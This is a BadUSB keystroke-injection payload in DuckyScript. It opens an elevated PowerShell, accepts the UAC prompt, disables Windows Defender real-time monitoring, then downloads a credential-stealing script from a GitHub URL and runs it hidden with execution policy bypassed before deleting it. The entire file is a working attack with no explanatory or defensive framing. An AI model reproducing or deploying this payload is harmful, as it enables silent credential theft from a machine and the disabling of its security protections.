DELAY 1000
GUI r
DELAY 200
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT Y
DELAY 500
ALT Y
DELAY 2000
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 200
STRING $d=New-Object Net.WebClient;$u='https://raw.githubusercontent.com/blinhares/bruce-sd-card/9b51b8e6c937774061b8d689c22eef37f1915471/BadUSB/Payloads/library/credentials/-RD-Credz-Plz/Credz_02.ps1';$f='t.ps1';$d.DownloadFile($u,$f);powershell -w h -ep Bypass -c "gc $f -Raw|iex";rm $f -ea 0;exit
ENTER